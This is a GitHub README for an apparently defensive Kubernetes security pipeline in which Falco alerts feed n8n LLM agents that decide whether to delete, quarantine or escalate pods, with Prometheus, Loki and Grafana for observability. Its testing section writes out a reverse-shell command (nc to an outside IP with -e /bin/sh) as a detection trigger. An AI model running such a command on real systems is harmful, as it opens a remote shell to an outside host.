holydanchik/k8s-ai-agent

GitHub: holydanchik/k8s-ai-agent

An AI-driven tool for automating Kubernetes security response

Stars: 0 | Forks: 0

# AI-Driven Kubernetes Runtime Security System

### *Falco + n8n AI Agents + ROSES + RACE + Prometheus + Loki + Grafana*

This project implements a fully automated, **AI-enhanced security and response pipeline** for Kubernetes. It detects threats with **Falco**, analyzes incidents with **LLM-based ROSES & RACE agents**, performs autonomous remediation, exports **SRE-grade metrics** to Prometheus, and streams logs to Loki for full observability.

# 📌 Architecture Overview

```
Falco → Falcosidekick → n8n Webhook
                ↓
┌────────────────────────────────────────────┐
│              n8n AI Pipeline               │
│--------------------------------------------│
│ ROSES → JSON Parser → RACE → JSON Parser   │
│ → Decision Switch → K8s API Actions        │
│ → Pushgateway (Prometheus Metrics)         │
│ → Loki (Log Storage)                       │
└────────────────────────────────────────────┘
                ↓
        Grafana Dashboards
```

# 🚀 Quick Start

## 1. Deploy the whole system

```
./deploy.sh
```

This script installs:

- A KIND Kubernetes cluster
- Falco + Falcosidekick UI
- n8n exposed via NodePort
- RBAC + a ServiceAccount token
- Loki + Promtail + Grafana
- Prometheus + Pushgateway
- The quarantine NetworkPolicy
- Playground test pods

# 🌐 Access URLs

After installation:

```
Falco UI:    http://localhost:32040
n8n UI:      http://localhost:30008
Grafana:     http://localhost:30300
Prometheus:  http://localhost:30900
Pushgateway: http://localhost:30123
```

The script automatically prints the Kubernetes API token for n8n.

# n8n AI Pipeline

## 1. Webhook (Falco → n8n)

Receives Falco alerts as JSON.

## 2. ROSES AI agent

Analyzes the incident using the ROSES framework:

- Role
- Objective
- Steps
- Evidence
- Summary

## 3. ROSES JSON parser

Extracts valid JSON from the agent output with a regular expression:

```
const raw = $input.first().json.output;
// Matches the first {...} object; the pattern allows one level of nested braces.
const jsonMatch = raw.match(/\{(?:[^{}]|(?:\{[^{}]*\}))*\}/);
// Fail with a clear message instead of a TypeError when no JSON is found.
if (!jsonMatch) throw new Error("No JSON object found in agent output");
return [{ json: JSON.parse(jsonMatch[0]) }];
```

## 4. RACE AI agent

Makes the final decision:

- Delete the pod
- Quarantine the pod
- Ignore
- Escalate

## 5. RACE parser

Uses the same logic as the ROSES parser.

## 6. Build Prometheus metrics

```
return [{
  json: {
    mtta: 4.2,
    mttr: 4.2,
    classification: "true_positive",
    decision: "delete_pod"
  }
}];
```

## 7. Pushgateway HTTP request

```
POST /metrics/job/incident-pipeline
Content-Type: text/plain

incident_pipeline_mtta_seconds 4.2
incident_pipeline_mttr_seconds 4.2
incident_pipeline_incident_total{classification="true_positive"} 1
incident_pipeline_decision_total{decision="delete_pod"} 1
incident_pipeline_events_total 1
```

## 8. Switch node → Kubernetes API

Decision logic:

```
delete_pod     → kubectl delete pod
quarantine_pod → patch label + apply NetworkPolicy
escalate       → external webhook / Slack
ignore         → do nothing
```

# 🧪 Testing with Playground Pods

The script deploys:

```
kubectl apply -f manifests/playground/pod-delete.yaml
kubectl apply -f manifests/playground/pod-quarantine.yaml
kubectl apply -f manifests/playground/escalate-test.yaml
kubectl apply -f manifests/playground/test-shell.yaml
```

Run a command inside a pod to trigger Falco, for example:

```
kubectl exec -n playground -it pod-delete-test -- nc 1.1.1.1 4444 -e /bin/sh
```

# 🔒 Quarantine Mode

Patch the pod:

```
kubectl patch pod pod-quarantine-test \
  -n playground \
  -p '{"metadata":{"labels":{"security/quarantined":"true"}}}'
```

The quarantine NetworkPolicy then applies automatically:

```
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: quarantine
spec:
  podSelector:
    matchLabels:
      security/quarantined: "true"
  ingress: []
  egress: []
  policyTypes:
    - Ingress
    - Egress
```

# 📊 Prometheus Metrics

## MTTA

Mean time to acknowledge:

```
avg_over_time(incident_pipeline_mtta_seconds[24h])
```

## MTTR

Mean time to respond:

```
avg_over_time(incident_pipeline_mttr_seconds[24h])
```

## False positive rate

```
sum(incident_pipeline_incident_total{classification="false_positive"}) / sum(incident_pipeline_incident_total)
```

## Decision distribution

```
sum by(decision) (incident_pipeline_decision_total)
```

# 📝 Loki Log Storage

n8n pushes structured logs:

```
{
  "decision": "delete_pod",
  "classification": "true_positive",
  "pod": "pod-delete-test",
  "timestamp": "2025-12-11T06:33:14Z"
}
```

Query them in Grafana Explore:

```
{job="incident-pipeline"}
```

# 📈 Grafana Dashboards

Recommended panels:

## MTTA trend

```
incident_pipeline_mtta_seconds
```

## MTTR trend

```
incident_pipeline_mttr_seconds
```

## Decision distribution (pie chart)

```
sum(incident_pipeline_decision_total) by (decision)
```

## Classification heatmap

```
sum(incident_pipeline_incident_total) by (classification)
```

## Loki log table

```
{job="incident-pipeline"}
```

# 📂 Repository Structure

```
├── cluster/
│   └── kind-config.yaml
├── deploy.sh
├── manifests/
│   ├── falco/
│   ├── n8n/
│   ├── monitoring/
│   ├── playground/
│   ├── policy/
│   └── token/
└── README.md
```

# 🛡 Security Notes

- All actions use a restricted ServiceAccount
- Only pod deletion and patching are allowed
- All decisions are logged
- All metrics are exported
- Full traceability is available through Loki

# 🎯 Conclusion

This project demonstrates a production-grade, AI-driven Kubernetes security pipeline:

✔ Real-time detection (Falco)
✔ AI reasoning (ROSES)
✔ AI classification (RACE)
✔ Autonomous remediation (n8n + K8s API)
✔ MTTA/MTTR/FPR observability (Prometheus)
✔ Full audit logs (Loki)
✔ Dashboards (Grafana)

It is a complete, research-ready and production-ready system for AI-driven SecOps / AIOps / cloud security automation.
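
To illustrate how the metrics object built in pipeline step 6 could become the Pushgateway request body in step 7, here is a minimal sketch. The metric names are taken from this README; the helpers `escapeLabel` and `buildPushgatewayBody` are hypothetical and not part of the repository, and the actual workflow may assemble the body differently.

```javascript
// Hypothetical helpers (not from the repository): render the step-6 metrics
// object as the plain-text body shown in step 7.

// Escape backslash, double quote, and newline in a label value, as the
// Prometheus text exposition format requires.
function escapeLabel(value) {
  return String(value)
    .replace(/\\/g, '\\\\')
    .replace(/"/g, '\\"')
    .replace(/\n/g, '\\n');
}

// Build one metric sample per line from { mtta, mttr, classification, decision }.
function buildPushgatewayBody(m) {
  const lines = [
    `incident_pipeline_mtta_seconds ${m.mtta}`,
    `incident_pipeline_mttr_seconds ${m.mttr}`,
    `incident_pipeline_incident_total{classification="${escapeLabel(m.classification)}"} 1`,
    `incident_pipeline_decision_total{decision="${escapeLabel(m.decision)}"} 1`,
    'incident_pipeline_events_total 1',
  ];
  // Every line, including the last, must end with a line feed.
  return lines.join('\n') + '\n';
}

// Possible use inside an n8n Code node (the `body` field name is an assumption):
// return [{ json: { body: buildPushgatewayBody($input.first().json) } }];
```

Escaping label values matters here because `classification` and `decision` come from LLM output. Note also that Pushgateway stores the most recently pushed value for each metric in a group and does not sum pushes, so the `1` samples describe the latest incident and are not a running total.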

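Tags: AI analysis, AMSI bypass, Falco, Grafana, JSON parsing, Loki, n8n, OISF, RACE, ROSES, Webhook, web screenshots, incident analysis, artificial intelligence, force-directed graph, threat detection, subdomain mutation, security event detection, security response, security metrics, security architecture, container security, quick start, performance monitoring, sensitive-word filtering, log auditing, log management, modular design, user-mode hook bypass, system deployment, network policy, scripted deployment, automated remediation, automated response, custom request headers, request interception, reverse-engineering tools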